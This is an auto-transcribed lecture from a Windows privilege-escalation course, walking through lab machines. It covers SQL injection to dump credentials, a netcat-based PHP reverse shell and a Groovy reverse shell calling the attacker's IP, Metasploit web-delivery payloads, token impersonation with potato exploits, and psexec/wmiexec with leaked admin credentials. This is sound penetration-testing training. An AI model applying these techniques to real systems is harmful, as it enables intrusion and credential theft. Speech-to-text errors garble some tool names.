root at Cali you're in another box you're in your own box but you're in the box from within a box it's like box section so what we're going to do is we're going to run a command now and what we can do is we can check this and this is going to be funky because of the Box section that we're in but we can run a netstat ano and we can grep on 445 and when you run that command just hit enter a few times until it comes through okay you can see it came through and look 127.0.0.1 445 we are correctly connected to this machine we have correctly Port forwarded so this is something that took me a long time to get my mind around just make sure you understand what's going on here we are forwarding this port that is only open internally to us we're allowing this connection over the SSH we're doing a port forward so now and if you need more information on that command you can come back into this as well remember I said at the beginning of the video that you can come in here and you can look at this kind of print out and look at plink and see how you can do this now you can also do a port forward with interpreter but we're kind of staying away from this here's information on what 0.0.0.0 means all the way through if you want some reading material okay so the last thing we're going to do is we're going to use a tool called win EXE so when exe is a Linux based application that's going to allow us to execute commands on a Windows system so how are we going to do that well we're going to give this a go we don't know yet what's going to happen but what I want to try is I want to say hey when EXE and the syntax is going to look something like this we're going to provide a username I'm just going to say administrator and then we're going to do a percent the percent is going to say hey upcoming now is the password and we're going to say welcome one exclamation I'm gonna say do this over Port 1.127.0.0.1 that means we're connecting to 445 with win exe over the one two seven zero zero one this port forward and what I want to execute is command.exe I want to try to get a command prompt now when I hit enter it's going to look like it fails and we're gonna just run this through a couple times until maybe something happens for us and okay we've got a shell now what kind of shell is this let's go ahead and say who am I and again hit enter a couple times and you see Chatterbox administrator now this isn't the best shell to be in however we could run something if we wanted to improve this we could upload like netcat we can do assert util.exe and then run another URL cache upload netcat and then run netcat on this machine and get an improved shell if we want to where it's not all funky like this but the goal of hack the box or any sort of Capture the Flag or any sort of a lab is to get the administrator or the system level on this machine so we've done that we've actually gotten to the administrator it's the the same thing as owning the machine so this is the correct path if you got this on your own congratulations that's really really awesome if you didn't hopefully this makes a lot of sense what we did was we went we did our basic enumeration we didn't have to rely on any tools and like I told you guys we did this within a quarter of the page the first quarter of the page had all the answers for us so this is a good example on not relying on tools and just the basic methodology of how we can do this from a Hands-On perspective and not to trust everything that you see if you just were doing this and you said Alfred welcome one that's great what do I need his password for you never know where that password is going to go this could have gone to something like a web application or something else internally we don't know but if there's a credential that's being leaked especially in a capture the flag situation chances are it's meant to be there for some reason or another so take note of everything that you're seeing especially with these open ports and being able to do port forwarding and these sorts of things like these passwords they come up all the time so from here we're going to move on and we're going to start talking about the windows subsystem for Linux which is something that's kind of a newer feature that just came out and we're going to see how a misconfiguration could allow for a complete privilege escalation so I'll see you over in the next segment next up is the windows subsystem for Linux now this was initially released in 2016 and allows you to run Linux on top of your Windows system so it's basically a subsystem so what this does is you can run something like Ubuntu or even Kali Linux right on top without having to use a VM or anything else now this does have some vulnerabilities to it if you could see here on our little cheat sheet from payloads all the things we can see that with root privileges it allows users to create a bind shell on any port with no elevation needed don't know the root password no problem and here's some commands that we can run we can run this WSL who am I it'll say hey we're root and then we can try to run a python type reverse shell now this is a big hint for the Box upcoming if you want to try it all the way through this is not actually going to work in fact we're going to utilize a little bit of Linux privilege escalation to get root on our machine so I'm doing this box to get you thinking about the windows subsystem for Linux in case you ever see this and you're doing enumeration it pops up because this is in fact a way to escalate however it's not going to be fully there there's going to be a little bit of an alternate path to actually get a full system shell on the machine however keep in mind that the bash.exe exists and we're going to go into that as well so what we're going to do is we're going to run up a box called secnotes SEC notes and it lives at 10.10.10.97 what I want you to do is go ahead and hit play get your box scan and give it a go see if you can get a lower level privileged shell on this machine so catch me in the next video we're going to walk through it and then we'll talk through the escalation all right let's look at our end map scan here we've got three ports that return back we've got HTTP on Port 80. we've got HTTP on Port 8808 and then we've got SMB on Port 445. now we see Microsoft IIs which is telling this this is a Windows machine and we see the SMB enumeration here which says Windows 10 Enterprise if we scroll down a little bit it also says Hey Windows 10 Enterprise 6.3 we've got 17 134. so we've got a little bit of os information right here if we're looking for any sort of exploit related to that we also see the computer name is SEC notes and we've got the work group of htb for hack the Box so the thing that we should probably do is go out and try to explore these web pages and then we'll leave 445 for a later time though what we can do with 445 if we want to do some basic enumeration is we can come out here and I'm just going to close out of my tabs and we're going to say we get to say SMB client we'll do a quick Dash L for a list and then I'll just give it a 10.10.10.97 see if we can list this out hit enter and we get access denied so that's why we're not going to enumerate SMB first now let's go to Port 80 because it does look like it has a login page here where Port 8808 just has a basic IAS Windows titled page so let's first explore port 80. so if we go to 10.10.10.97 we can see we are given a login page and it says Hey give us your login credentials and go ahead and log in well if you don't have an account try to sign up so let's just sign up for an account and see what's going on inside we'll say TCM I'll just give it a password of TCM twice and password must be six characters in links I'll do TCM one two three okay let's try logging in with that and we can see that we're viewing secure notes for TCM it looks like we can create some notes maybe test and then put a test note in here and save it Okay so we've got our test note we can change our password we can sign out and then there's a contact us or you can send a message to this Tyler at secnotes.htv so this looks like we have a username enumeration here we can say hey at least we know the user's name is Tyler so that might help us a little bit later on when I see a login page I'm immediately thinking some sort of SQL injection exists here so I'm gonna go try that first and I might just try something first on the login page like a click one or one equals one and then something like this and see if that works and just use that in both Fields no account found with that username and we could even try just like a just to generate an error here and it's saying no account found with that username okay so maybe we don't have SQL injection here or maybe we just run this through something like burp Intruder and try to see if we can get some sort of different response to come through but just for the sake of time and for the sake of this class we don't have SQL injection on this page itself where the SQL injection actually exists is on the sign up page which would be the next place to try so when we're doing any kind of web app testing and this is real world experience here if we're doing any kind of web app testing I want to see what kind of malicious items I can dump into these pages and get something back so I'm looking at if I can maybe create even like a script uh alert one for example if I'm testing a website if I'm allowed to make a username like that and then I log in and there's cross-site scripting that pops up that's not good same thing goes for SQL injection what if I did something like one or one like this which is just a common payload and you could again can run through the different payloads and see what works so you can take something like burp Intruder and we can open it up and do an example here where we say hey I want to create something and I'm just going to hit OK and you should be familiar with burps sweep by this point so I'm not going to give you the full walkthrough but we can start burp sweep and we can go ahead and just use something like Foxy proxy to turn on our proxy all this is doing if you've never seen foxyproxy before is going and doing our settings for us so like our preferences typically for burp Suite we would have to manually intercept 127.0.01 on 8080. now foxy proxy just allows us to come in here and say hey that's exactly what I want to do with this burp Suite I just want a 127.0.0.1 on port 8080 and it'll just set it for us so it's just a quick flip of a switch instead of having to go into preferences dig in Etc so we can come in here and we can say Okay I want to do this and I'm going to do a password and confirm of the same and I'll just go ahead and intercept this request you'll see it goes into burp suite and we can decide to forward this or do whatever we want with it so I can send this to intruder and I could say something like just as an example I can give it different parameters so I can clear all of these and we can say hey I want to do uh one two three here just for the confirm and we'll say okay for the payloads what I want to set all the payloads to is this SQL injection so maybe I do or one or one or we do like the one we just saw where one or one equals one dash dash dash and with this sniper attack what it's going to do is it's going to go ahead and just try to create a username in all these fields so it's going to put this one payload that we set for all the fields that are set here if we wanted to do other attacks we could do like a pitchfork where we'd have three different payloads for example and we'd say hey payload one or position one we're gonna put here and then we're gonna go say hey for payload two we'll put something else but for this I just want them all to be the same so I'm just going to go ahead and do a sniper attack and then I'm just going to start the attack and it's going to say hey burp Suite takes its sweet time for this um and that is what it is you know because it's we're on the Community Edition so we could look at the response and see what happens uh the username's already taken that's okay somebody's probably already been on this box no worries about that part uh same thing with this one looks like people were trying this that's okay if you're getting the usernames already taken don't worry about it um on this 1854 you could see the payload change slightly but it says the username's already taken as well so we're just going to do the manual method I'm going to go ahead and just turn the intercept off it's going to say the inner this username is already taken as well I'm gonna go ahead and just go back to the home page and we're going to try to log in with this injected account and you can see now it says reviewing secure notes for or one or end right so we're ending something here we're saying or one or and then we're starting something which just uh completely removes everything else and we're getting the information for uh everybody you can see the test note that I made here 419 2020. um we could see the Mimi sticky buns ingredients we're getting all the database dropped out for us and here we can see that there is a sec notes.htb backslash new Dash site looks like a SMB folder we've got Tyler and then it looks like credentials here so that's good and so we've just basically done SQL injection and gone into this website dump these credentials out and now we can utilize them to try to get a shell on this machine so what I've gone ahead and done is I'm going to go ahead and try PS exec for example uh just in case you want to know here's a PS exec dot PI from the in packet in packet toolkit PS exec dot pi and we're just going to say hey I want to connect uh let's do a dash dash help and this is just to prove a point here you don't have to follow along and we're going to say okay we need a username password and then IP address so I'm going to Supply Tyler and then I'm going to supply the password which is on this page and I'm going to put that in quotes and then I'm going to supply the IP address of 10.10.10.97. I'm going to try to run this you're going to see okay admin's not writable he's not an admin C is not writable found a writable share uploading a file and and it's not able to open it up it's trying it's not able to open up sometimes it Sears out I'll give it a second go but for me this wasn't working so this is like a quick win I'm just thinking hey maybe PS exact I can upload some sort of malware get on the machine and go maybe there's antivirus or something blocking this or like Windows Defender something along those lines is saying nope you can't do this sort of attack I'm going to go ahead and block this attack so we're not getting in here other route that we can take is we can go explore the new site and see what's there so let's go ahead and just try that we'll say SMB client and we'll go ahead and just do something along these lines 10.10.10.97 and we'll say new site and then we'll just provide a username of Tyler just like that it's going to ask for Tyler's password which is right here I'm just going to copy that again and paste it here okay and we got it and let's just do a quick LS now we've got this is start in this Ias .png which reminds me of a default home page similar to devil from beginning of the course right well where did we kind of maybe see that already if we go back to our nmap scan you can see that we saw possibly a default IIs page over on 8808 so if we go look at 8808 we can maybe confirm that so let's go ahead and just do 8808 here and see what's going on okay so we do have a default page now to skip a step the wheel's spinning in your mind you're probably thinking well maybe I could just do a Metasploit payload try to run that get it to go with an aspx and I tried that as well it does not work so we have to think outside the box now something is going in there and deleting things very very quickly it could be antivirus again there could be a script running saying hey delete everything out of this that you know doesn't belong here I'm guessing we're probably up against some sort of antivirus but we're not sure at this point so what we can do is we could say well we're in here maybe I can upload something like netcat and then just run a malicious PHP shell or something along those lines so if you've never seen this before let me walk you through it so on your box your Cali machine you have the netcat.exe you can do a quick locate netcat.exe and you can see we've got this user share Windows resources binaries netcat.exe we've talked about this in the past right well let's go ahead and do something like this we'll do a copy paste and we'll say just netcat.exe right into the root folder so we're just copying this binary into our root and then we're just going to go over to this SMB which we launched in root and I'm just going to say put netcat.exe and then what we can do is we can go ahead and use a malicious PHP file so I've gone ahead and created one let's go ahead and just check it out so I've called it just rev.phpreverse.php and we can go ahead and just look at the command so we're going to say hey when we run this go ahead and execute something on the system and you're going to execute netcat.exe we're going to execute the command.exe and we're going to say 10.10.14.5 that's my IP address and then I'm going to listen on four four four four so it's going to be a basic reverse shell written in PHP okay so go ahead and get that typed out pause if you need to I'm going to go ahead and just close out because I've already got it saved and then we're going to run this so what we're going to do is we're going to do a quick LS make sure our netcat's still there it is I'm gonna put in this reverse dot PHP and I'm going to run a netcat listener so nblp 4444 we're listening I'm going to go to the web page and I'm just going to do a quick rev.php and it's stalling which is usually a good sign we can come in and you can see okay hey we're at C inet Pub new site do a quick who am I SEC notes Tyler and then we can just do a quick System Info get a little bit of information about this computer Etc but what we've done up to this point is we have now gotten access oh look System Info is actually denied let's see a quick query too let's see if we're up against wind defend well we might be up against here it is running so uh the Windows 10 version of of this is probably doing a lot better job than the Windows 7 that we've seen the past so there's a good chance that we're actually getting some sort of um some sort of antivirus that we're up against but from here I want you to do a little bit of thinking outside the box on your own I really do believe with the little bit of guidance from this article this is the payloads all the things again from your course resources look at this look at this closely utilize commands that you can run Against the Machine to find where bash.exe exists or wsl.exe exist figure out how that might work for you and how you can utilize this and see what level user are or what level user you are kind of gave it away you're going to be root but do a little bit of enumeration try to get into the system itself and go from there see if you could figure out how to find your way to escalate privileges into system I have faith in you however in the next video we are going to walk through this and I'll show you exactly how to find this file how we're going to abuse it and how we're going to elevate privileges okay so I'll see you over in the next video okay so here we are we are ready to figure out this escalation and we know it has something to do with the windows subsystem for Linux okay so what can we do with that well we have a little cheat sheet guide we talked about it and we know that wsl.exe exists in bash.exe exists so we could try to find both of those really quick so if we go to our terminal and we say something along the lines of where we do a dash r r just means recursive and we're going to look and see and I'm actually going to expand it to Windows I think it's hiding in Windows somewhere and we'll do a bash.exe now you could use a find or any other command that you would like against this this is just how I use it to quickly find it you can see there is the bash.exe and we could do another quick one of these where I copy this and we'll run it against the wsl.exe and see where those are hiding so let's do a quick one on wsl.exe and I'm guessing it's in this win sxs folder as well because that's where everything else has been related to this windows subsystem for Linux so you can see the wsl.exe here we can go ahead and run pretty much any of these and see what's going on the bash.exe will bring up a bash command prompt but remember we could do something quickly like a who am I on this wsl.exe and see now we can do like a quick paste and say who am I and it should return root and you can see there it did return root now remember I told you that you can't run this but if you could WSL python.c you could run a python reverse shell or even a buying shell here and open up a port however that's not the method of exploitation here that's not the true escalation that we're going to do so let's go ahead and just run the bash.exe and drop into a command prompt here well a Linux terminal I should say okay so it says TTY name failed inappropriate okay that's fine let's just say who am I root host name and we're on SEC notes but don't let this fool you this is just the Linux of SEC node so we could do a quick you name Dash a and see what we're on we're on a Linux machine uh for Microsoft so we're on this subsystem for Linux now we are in a non TTY so what we need to do is try to elevate or Escape here and we're going to do a quick Python and do a dash C and we'll do import PTY and then we'll do PTY dot spawn and we'll go ahead and give it a bin bash let's see if that works okay now you can see we have the root at SEC notes now if you ever are concerned with TTY escapes you see something along those lines you could do a TTY Escape and cheat sheet is usually what I go with on a search spawning a TTY shell this netsec.ws here is really really good you can just come in here click on it and you can see here's where the python command came from I just did a bash instead of an sh there's Echo there's all kinds of different options to try to spawn a TTY shell so now we have a TTY shell that's great now we haven't done any sort of Linux enumeration in this course because it's a Windows course but some of the quick things that I like to do when I'm looking is I like to get a lay of the land and just say hey what's my present working directory I'm enroute okay our print working directory to a ls-la and we can see okay well nothing going on here we do have a bash history which we could try to type the history command or just try to cap that out I always check the history command that's one of the first things I check when I'm doing any sort of window or Linux provesque I also do like a pseudo-l however I don't think that I'll run here so I already see something very very interesting and this is actually really common if you're doing sort of like Linux provesque stuff if you do history you can see easy wins in history all the time it's one of the quick wins look at this command here SMB client Dash U administrator here's a password here's a 127.0.0.1 and see well we can run this command this is this is it we we win we're we're going to get root um we can run this command and this will give us a our access to the file system so let's take a quick look I'll show you if we just open up a new tab and we just paste that really quick and we give it the IP address instead of local we give it the IP address that it wants and we just say what else did it ask for anything C wants to connect to C drive we can say c and LS you can see okay we've got full access over this system but that's not really a shell we could go in and we can get the the flags they're trying to capture the flag here that's that's not the the true way so let's go ahead and exit out of this again I mentioned impact it before and I mentioned PS exec now I realize that maybe you've never used impack it it is expected that you know what it is at this point because this isn't a beginner level course fully so I'm going to go ahead and just show you really quick so you can go in packet GitHub if you've never heard of this this secure authorp right here just click on this link very very easy to install you can just do a quick cloner download grab this link here I always put this in my opt so I would go CD slash opt I would say git clone paste this in here I'm not going to actually do it because I already have it hit enter on that then you can CD into your impact it folder and you could say pip3 install period and it'll install it now I think the original calls for pip install if you're on Cali 2020 or later you're not going to have Pip installed by default because now Python 3 is the way to go so let's go ahead and imagine you've done all that or you have it ready to go let's take these credentials and try to do something with it now we did the PS exec before and we can try it again I'm going to show you this is actually very real world so say you try to do PS exact it's an easy win you can do administrator and we can say something along the lines of paste that at 10.10.10.97. okay it's going to try to connect it found the admin writable share that means we have admin privileges we can write to the adventure it's amazing that's what you want to see except what do we have happening looks like we have some sort of antivirus blocking this again this is very common so if I were to see this on an assessment I'm going to go ahead and try to kill this and maybe we can just do something else so there's a few different execs there's an SMB exec which does very similar thing gives us kind of a half shell so I'll try a w or SMB exact here another one is called wmi exec I always try all three you never know where you're going to get lucky and now you're in this semi-interactive shells you could say who am I and you're going to return Authority system so we are system on this machine we do have a full shell we have full control we can utilize the netcat that we found go spawn a quick reverse shell and get another shell on this if we want something uh fully interactive as opposed to the semi-interactive but at this point this is full Ownage of this machine so I hope you were able to take it this far if you weren't that's okay you're in this class to learn so keep challenging yourself as we go through these challenges the challenges are going to get a little bit harder as we go up until we get to the lab section of our course and then into the Capstone so from here we're just gonna keep doing walkthroughs and we're going to try to build up that mentality of how to do enumeration and you'll have a little bit of hints to kind of go along with it and then you'll build it all up as we go so keep challenging yourself if this is a struggle that's absolutely okay but I will see you in the next section where we're going to be covering impersonation attacks and this is our some of my favorite uh gets down to real world and some of this and we're gonna do one of my favorite hack the Box machines as well so I will see you guys in the next section all right so we've come to a little bit of a meaty part of the course where we're going to do a few videos in a row that are kind of a little bit of Death by PowerPoint but I really need to get the point across as to what we're doing and why we're doing it that way you have a better understanding of the following attack that's about to come so this first part of the videos are on token impersonation which if you've done the other udemy course you've seen this in the active directory portion and this is a very very real thing that we see on assessments and you're going to see how it comes into play when it comes attack time but I'm going to show you a quick overview we'll talk about token impersonation and then we'll start talking about the different privileges you might see in a machine and the potato attacks so token impersonation what are tokens so tokens are basically like cookies for your computer they are temporary Keys allow you to have access to a system or a network without having to provide credentials each time you access a file so there are two types there's a delegate token and an impersonate token now the delegate tokens what we're going to see most often you're looking for somebody logging into a machine or even like remote desktop let's say you have a situation where you're sitting at a computer and somebody comes over and switches user and they log in as a user well they're leaving a token behind just as you're leaving a token behind an impersonate token uses a a script more than that interaction so like attaching a network drive or domain logon script those are a little bit different you don't see them as much so we see a lot of delegate tokens and you're going to see an example here as to why that's going to be bad but just think of somebody like a domain admin logging in or help desk logging into a computer and just leaving a token behind who knows when that computer is going to get rebooted and that's the only time these tokens go away so let's take a look at why this is bad so here is an example from a lab that I had set up where we have a regular user named Frank Castle and we load this tool called Incognito which you're going to see here in just a little bit and this is part of interpreter we list the tokens out and we say hey I have Frank Castle here and I want to impersonate Frank Castle so we just say impersonate token I'm impersonating Frank Castle if you go into a shell you are this user so we say who am I Frank Castle okay well let's try to run Mimi cats and we're going to run Mimi cats which is going to attempt to dump the LSA off of the domain controller here which is this hydra.marvel.local all we're doing is something really malicious we're trying to dump all the hashes from the domain controller well this person's not a domain admin so we're getting access is denied however what if a domain admin token was available or an administrator token or a system token don't think of this just from an active directory even though this is an active directory example think of this for for any sort of escalation here if you see an administrator token when you go list all tokens and you say hey I want to impersonate this token guess what you can drop into a shell and now you are the administrator and you own everything from an active directory perspective if you can run mimikats remotely you can dump the LSA and you can get uh very sensitive hashes including the Kerberos hash which allows you to create golden tickets and do a lot of nasty nasty things in the network so going back just a little bit here remember we're looking for any sort of token that's available to us so if we see the administrator token we Elevate into that token we are the administrator we control that machine it's game over so that's what token impersonation is and it's really really bad and does show up in the real world so in the next video we're going to look at the get privs command and the who am I slash all command and look at some of the different privileges that you might see on a system and how they can relate to being bad and then this is all going to tie together in the third video when we talk about potato attacks so I will catch you over in the next video all right I'm gonna try to stay away from the PowerPoint in this video so let's say that we've owned a machine and we run the who am I slash prayer remember we ran this in the enumeration section and we pulled down these different Privileges and you can see kind of a description that comes back this is an example if we are on just a regular shell where we've dropped into a shell who am I slash priv pull down privileges we could see some of these some of these really okay if we have the ability to shut down a system here we don't can we move a computer from docking station we don't have that privilege either so some of these are just like okay I don't see the escalation here and that's probably because there isn't really an escalation change the time zone Etc but there are some of these that are bad like this impersonate privilege now think about what impersonate is token impersonation yes you got it so impersonates one of the bad ones uh this change notify could be one as well bypass Traverse checking there's a few in here that are bad now just as another example I can bring up The Interpreter version of it which is just get privs and you can see we've got the same kind of things in here uh just shows you the Privileges from a different perspective and it just says SE change notify privilege so you can see what privileges are enabled on this system now there are several that can be malicious now of course I'm going to come back to our uh payload all the things and show you some of these impersonation privileges so if you're interested this is where it's at this tells you a little bit more about it and how they are important there's also a if you click on this right here private admin there's a list of all the different types of Privileges and how they can be escalated or potentially escalated or if they're even worth escalating so this is a great resource as well but here are the key common ones and I'm not going to cover all of these in depth but let's talk about them now SE assigned primary token this is the same thing as the impersonate you'll see that impersonates actually not on this list but it's the same thing and look it says this allows us to impersonate tokens and priv S to the NT system using tools such as potato rotten potato and juicy potato a little bit of foreshadowing potato chacks all right uh backup if we can if we can perform backup we can read sensitive files create a token we can create tokens okay and it kind of tells you just along the lines of what we're capable of doing here if we have debug we can duplicate the lsas that's pretty good uh the restore as well and SC take ownership is another big one where you can take ownership of a file so that's also uh one if you see this enabled really the one that we're looking for is this SE assigned primary token or SC impersonate so if you see that running immediately just think hey I might have a potato attack here so in the next video we'll talk about what these potato attacks are and how they're important I just want to get your wheels spinning right now on these different uh these different privileges that allow us to escalate okay so this Focus for this segment is going to be the assigned primary token or again that impersonate privilege okay so SE impersonate so let's go ahead and move on to the next video where we talk about potato attacks what they are and then we're going to move on to our box and see how we can exploit using potato attacks all right so on to the potato attacks now Fox Glove security is the blog of choice here as they release the full details on what the potato attacks are now if you're into the nerdy stuff I'm going to link this you can come down here and read all the fine details on how they created this exploit and how it fully works but what we really need to know at a high level is these top three things and really number three is what we're looking for so it says Hey to describe this at a high level we're going to trick The Authority system account into authenticating via ntlm to a TCP endpoint Wii control alright so we control a TCP endpoint the man in the middle this authentication attempt to locally negotiate a security token for the NT Authority system account this is done through a series of Windows API calls last one impersonate the token that we've created this can only be done if the attacker's current account has the privilege to impersonate security tokens this is usually true of most service accounts and not true of most user level accounts so if you take control of a service account you might just have this impersonate token so let's take another look at this this is Juicy potato it just says it's a sugared version of rotten potato it's just another version of this and another exploit so again you're going to come in here and you're going to see hey juicy potato well it's leveraging the Essie impersonate or the SC assigned primary token these are the big things we need to be on the lookout for so you're going to see this come up quite a bit especially on hack the box or those other CTF type machines where you're on it and you're just like hey I'm gonna see if this is vulnerable I'm going to check my privs and this could be just a quick game over so you want to check these see if there's a vulnerability there and just get used to doing the get privs process or the the who am I slash privs process so from here now we're going to jump into hack the box so what I want you to do is I'm going to come over here I want you to go ahead and scan Jeeves and try to attack it now I fully believe that you should be able to get the low level user by yourself Jeeves is a great example of things that I actually see a lot in internal assessments so I'll talk about that in the next video but very common attack that I see in internal assessments still to this day and we'll talk about why it's bad why it's dangerous and then we'll see how to escalate this box as well so I will catch you over in the next video when we do the low level user walkthrough for Jeeves all right let's take a look at our mmap results so we've got Port 80 open for HTTP and we've got Port 50 000 open also for http and then we've got RPC and SMB open so we have a few different paths we can take and to save time I'm going to take us down the correct path but we could look at 445 we could do SMB clients see if we can connect anonymously we can do uh more information gathering or more enumeration on 445 see what service is running or what version of samba's running or SMB is running and see if that has any exploits available for it but here in this case we're just going to run off of Port 80 and Port 50 000. so let's go navigate to those I'm just going to copy this real quick let's navigate to those and see Let's uh let's do this we'll navigate there and then we'll also do an http and we'll do 50 000. Okay so we've got two things here we've got Ash Jeeves and when we have a web page like this we're probably just going to click around see what we've got but we can see that's just giving us a pound sign and here we could try to search something and it throws up this air which this would absolutely be a finding on a pen test so we're seeing some sort of SQL error and it's trying to tell us maybe hey there's some sort of SQL injection here and it's giving us a SQL server and all this other stuff except if we drag this this is actually just an image so it's just a trick page there's nothing actually here um so our options here and if we come to 50 000 we can see there's a powered by Jetty which takes us to Jetty and there's nothing there either so if we're sure that 80 000 or if we're sure that uh Port 80 is our path then we need to explore maybe directory busting here and see where we can get so what we're going to do is we're just going to run der Buster against 50 000. and we would say durbuster and like this or you can just run dirtbuster but then you come in here and you would specify so we would just say hey I want to run it against this and I'm going to say go faster I'm going to give it a word list so I like to actually use the built-in word list under user share and then word list and then there is dirt Buster in here there's actually a der Buster under the user share as well that you can use and then the medium lowercase list is what I use so I'm just going to leave it with PHP and we're just going to let it run for the sake of this walkthrough in the sake of this video we're just going to kind of skip ahead a little bit we'll look at the results later on but what we're going to find here is we're going to find an Ask Jeeves page this is going to be something like this ass Jeeves and we're going to go ahead and find that directory and this is where realism kind of comes into play I find Jenkins servers all the time and I find jaken servers now we have a login so we could go try to log in with weak password or credentials but I see Jenkins servers like this where you have builds out there and you have all sort of information on um like leak credentials all kinds of things user usernames I see API tokens I see all kinds of stuff hiding in Jacob servers on internal pen test so if you're watching this and you have a Jacob server secure your Jenkins server but okay if we go to manage Jenkins there's a nice little feature in here and that is the script console now Jenkins is very well known for having a script console in here I'm going to go ahead and just hit cancel on this and you can actually see I'm going to pause or stop this you can see that ashgs has been found in a directory so we have asked Jeeves it's already found that I'm going to go ahead and just stop this um so we have this script console in the script console runs groovy now groovy is a language okay so what if we did something like Google and we said groovy reverse shell pure groovy Java reverse shell I can't make this up it is honestly this easy so let's copy this and this will allow us to get a reverse shell with Jenkins so please don't have your script console open because this is just nasty so 10.10.14.3 is where I'm sitting Port 8044 is fine by me so I'm just going to open up a new window and I'm going to say netcat and vlp 8044 and I'm just going to run this and boom it's it's that easy it's really that easy so watch out for your Jenkins instances again and if you're a pen tester look for those because they are valuable valuable resources so here we are we are on this machine and I'm going to kind of do a little bit of the enumeration now and then we'll move on in the next video and we'll actually do the S collection so if we're on this machine the first thing I want to do is I want to just say who am I right okay we are uh who am I and we are this Jeeves kosuki I don't know how to say it uh we could do the quick who am I slash priv since we know that's kind of what we're looking at at this point and you kind of already know because of the section where we're going to we're going to go on this path but we can see here that the impersonate privilege is enabled so our Wheels should start spinning hey uh impersonate privilege maybe I've got something here so what we're going to do is we could also pull down just to show you we could pull down system info and save this out to a file and run our Windows privilege Checker right so I can come here copy this and then let's just go ahead and say uh it's actually here let me do this we'll go to a new tab here and I'll just say G edit sysinfo dot text even though I've already got this in here paste and Save and then I don't ever remember the command because it involves a little bit of stuff so I just type in history and then I say grep windows xplay suggestor and I just copy one of these so we'll just say windows X-Play suggestor and then it's got your database that you used last time we were doing this to the enumeration section I'm going to paste it in here and it's going to run this and we're going to see what sort of things come up so I'll make this a little bit bigger for here and if we scroll through this there's a lot of different things right but the Hot Potato comes up rotten potato comes up Tater comes up these are all potato attacks so if you're seeing this this is one of the easiest ways to get escalation on a system we have things for Internet Explorer but those aren't really a Microsoft Edge those aren't really what we're after here um if I see a potato attack I'm going to try that first so it's something to be thinking out and thinking for but I mean you have all kinds of attacks here so this is something that you should run pretty much right away and see what you can get you could also drop win Peas on this machine and run winpies see what that pulls back it's going to pull back a lot of the same so don't be afraid to to look through some of these see where you can get escalation now the other thing that we're going to do because we're doing a potato attack is we're going to run Metasploit for this one this is the most common and easiest way to do it so that's how we're going to perform it we're going to go through and we're going to go ahead and just get a Metasploit shell really quick so I'm going to say is msf console and we're going to do a web delivery so we're going to go ahead and just say use multi or use exploit multi-script web delivery and here's how we're going to set this up we're going to say options and we have targets down here we can go ahead and show targets we're not going to use Python unless python was on the machine we're just gonna go ahead and go for Powershell because this is going to give us a Powershell command to run and it's going to run it for us so we're just going to go ahead and say set Target Two and then we're going to have to change the payload because the payload is also uh python now I'm going to set this payload to Windows interpreter reverse TCP and why am I doing that I'm doing that because I tried x64 on this when I went through this the first time and it did not work so x64 does not work we're actually going to have to just get a lower level shell and go from there so we're going to get an x86 shell and if we need to migrate we will but for now let's just go ahead and do this and then we're going to set the L host so my L host is 10.10.14.3 and my server host is going to be 10.10.14.3 as well if we type options one more time we should have all the settings set so the server host is set our lhost is set our payload is set and our exploit Target is set to Powershell and I'm just going to run this and it's going to give us this Powershell command to run the job is already started in the background so we don't have to worry about anything and then all we got to do is come into here and just paste this hit enter and hopefully the magic works over here okay it's starting to fire we should get a shell there we go so now we'll just type in sessions one and open up our session and here we can do a quick get uid see where the same user we could do the sys info and see that we are x86 on 64 architecture so we might need to migrate and we can also do a git cribs we could say hey what get prebs do we have so this is The Interpreter way of doing it again we see this in person a privilege this is what we're after now we could run the post that allow us Post multi Recon and then local exploit suggestor just like that and this is going to do that same type of checking it's going to see what's available to us and you're going to see that there are a couple of built-in potato attacks as well so let's go ahead and let this run really quick actually what we'll do is let this run we'll stop the video here and we'll go ahead and move on in the next video and we'll actually start the escalation process so take a look at what's here you can see juicy this is a potato attack reflection also potato attack so two potato attacks right here go ahead pause now meet me in the next video when we actually start working on the escalation so I'll catch you over in the next video all right now let's say background on this session and we should still be in our ms-16075 reflection so quick pause after I recorded this I realized that I went through this on my own once and was already in this reflection so go ahead and type in use exploit Windows local ms16075 reflection here this is what you're going to want to type in make sure you do that and then follow along with the rest of the video so sorry about this small confusion here and let's go ahead and continue the video what we're going to go ahead and do is we're going to just do options really quick and I want to make sure that we have all the settings the same so make sure that your L host is set if it's not sometimes it sets to your eth0 instead of your ton zero make sure that your L Port is set to all fives because currently our session one is running on all fours so let's make sure that we set it to all fives or any port of your choosing and lastly let's go ahead and run a 64-bit meterpreter reverse TCP and hopefully this will work for us so go ahead make sure you set your payload make sure you set your L host make sure you set your L port make sure your session's correct and go ahead and run this let's see what happens okay and we get a interpreter session beautiful now let's load incognito let's list out our tokens and you can see now we have the impersonate token so here we go I'm going to copy this and we're just going to say impersonate token and I'm just going to paste this like this you can see we have impersonated user Authority system I'm going to drop into a shell okay and then I'm gonna CD over we actually we could say who am I real quick we are Authority system I'm going to CD over to see users administrator and then CD to desktop do a quick dir and you can see that there is this file hm.txt now if you're used to hack the box there should be a root flag here so if we type out hm.txt we see there's no root flag so we're going to do one more video here figure out how to find this root flower we're going to talk about alternate data streams and then we'll cap out this section of the course so I'll catch you in the next video we briefly talk about alternate data streams find the root flag and own this machine completely so catch you over there all right let's talk about alternate data streams I actually think this is super important so what's an alternate data stream well there's a great blog out there by Malwarebytes that kind of helps explain it and I'll link it in the course resources basically you have two types of data streams you have a like a primary or a regular data stream and then you also have a secondary or alternate data stream and this goes into a lot of detail on data streams how to retrieve them what you're looking for ETC what we need to know is your regular data stream is like your primary text inside of a file that's considered your primary data stream your alternate is a way to hide information within a file so we can hide data okay so let's take a look at how data actually is hidden here so we did a dur and we see okay the hm.text is here but we could take a deeper look it says look deeper so let's do that we can do a dur slash R like this and now look we've got dot text root dot text and then the dollar sign data so if we want to take a look at what's hiding in here we can do a lot of different things anything in that malware by its blog is perfect there's a tool from CIS internals called stream or streams that you can utilize there's Powershell that you can utilize you can also just do something like this you could say more and then you could just paste this in here and you can see that here is your root flag so always be cautious of an alternate data stream this is a way to hide information and something to know about so I thought this one was really cool just want to throw it out there you might see this show up sometime on a capture the flag or some sort of hack the box or any sort of machine like that a really neat trick so make sure you're aware of this and just keep in your notes so that's it in the next section we're going to go ahead and talk about git system briefly and then we're going to move on and start talking some even more prevask I'm really excited about it so catch you over in the next section okay so this segment is a hands-off segment and it's just to show you one of the features of Metasploit now this is just a shell that I have on a local Windows 7 machine here that I called Windows 7 provesque now there is a built-in tool that I have not shown you yet because I wanted to get through the impersonation and the other who am I privileges just so you understand those privileges first so now that we have an understanding of that I 